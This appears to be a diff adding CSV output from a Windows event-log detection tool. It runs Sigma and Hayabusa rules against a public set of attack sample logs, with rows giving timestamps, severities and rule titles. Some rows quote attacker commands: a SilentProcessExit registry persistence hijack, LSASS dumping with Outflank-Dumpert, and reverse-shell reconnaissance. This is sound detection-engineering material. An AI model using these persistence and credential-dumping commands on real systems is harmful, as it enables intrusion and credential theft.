+2019-06-20 02:22:43.944 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg  add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v MonitorProcess /d ""C:\windows\temp\evil.exe""  :  Path: C:\Windows\System32\reg.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:43.944 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:45.694 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:55.397 +09:00,IEWIN7,1,informational,Process Creation,"Command: notepad  :  Path: C:\Windows\System32\notepad.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:58.944 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\windows\temp\evil.exe  :  Path: C:\Windows\Temp\evil.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\werfault.exe"" -s -t 1340 -i 1352 -e 1352 -c 0",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:23:01.928 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe   :  Path: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: taskeng.exe {9AAB3F76-4849-4F03-9560-B020B4D0233D} S-1-5-18:NT AUTHORITY\System:Service:,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:23:01.990 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe  :  Path: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:23:02.350 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe -check plugin  :  Path: C:\Windows\System32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe  :  User: IEWIN7\IEUser  :  Parent Command: taskeng.exe {CF661A9C-C1B0-45D5-BC80-11E48F3A0B96} S-1-5-21-3583694148-1414552638-2922671848-1000:IEWIN7\IEUser:Interactive:LUA[1],rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:23:10.334 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\notepad.exe""   :  Path: C:\Windows\System32\notepad.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:23:11.694 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\windows\temp\evil.exe  :  Path: C:\Windows\Temp\evil.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\werfault.exe"" -s -t 3020 -i 2396 -e 2396 -c 0",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 17:07:42.331 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\NETSTAT.EXE""  -na  :  Path: C:\Windows\System32\NETSTAT.EXE  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:42.331 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:48.909 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""cmd""  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:48.909 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:48.925 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""cmd""  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:48.925 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:52.956 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""cmd""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:52.956 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:52.956 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:58.816 +09:00,IEWIN7,1,informational,Process Creation,"Command: systeminfo  :  Path: C:\Windows\System32\systeminfo.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""cmd""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-21 16:35:37.185 +09:00,alice.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path  :  Command: Outflank-Dumpert.exe  :  Path: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe  :  User: insecurebank\Administrator  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:37.377 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.128 +09:00,alice.insecurebank.local,1,informational,Process Creation,"Command: rundll32.exe  .\Outflank-Dumpert-DLL.dll, Dump  :  Path: C:\Windows\System32\rundll32.exe  :  User: insecurebank\Administrator  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.264 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.749 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:36:50.450 +09:00,alice.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path  :  Command: AndrewSpecial.exe  :  Path: C:\Users\administrator\Desktop\AndrewSpecial.exe  :  User: insecurebank\Administrator  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:36:51.682 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-07-04 05:39:29.223 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.254 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\notepad.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.254 +09:00,IEWIN7,1,high,Rundll32 Without Parameters,,rules/sigma/process_creation/win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.254 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:PowerShell/Powersploit.M  :  Severity: Severe  :  Type: Trojan  :  User: MSEDGEWIN10\IEUser  :  Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1  :  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:XML/Exeselrun.gen!A  :  Severity: Severe  :  Type: Trojan  :  User: MSEDGEWIN10\IEUser  :  Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl  :  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: HackTool:JS/Jsprat  :  Severity: High  :  Type: Tool  :  User: MSEDGEWIN10\IEUser  :  Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005)  :  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Backdoor:ASP/Ace.T  :  Severity: Severe  :  Type: Backdoor  :  User: MSEDGEWIN10\IEUser  :  Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx  :  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:Win32/Sehyioa.A!cl  :  Severity: Severe  :  Type: Trojan  :  User: MSEDGEWIN10\IEUser  :  Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll  :  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:51:50.275 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: HackTool:JS/Jsprat  :  Severity: High  :  Type: Tool  :  User: MSEDGEWIN10\IEUser  :  Path: containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068)  :  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:53:31.900 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:53:31.902 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 05:53:31.952 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
+2019-07-19 23:42:51.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 4516 288 0000023C0CA21C70  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:42:53.295 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
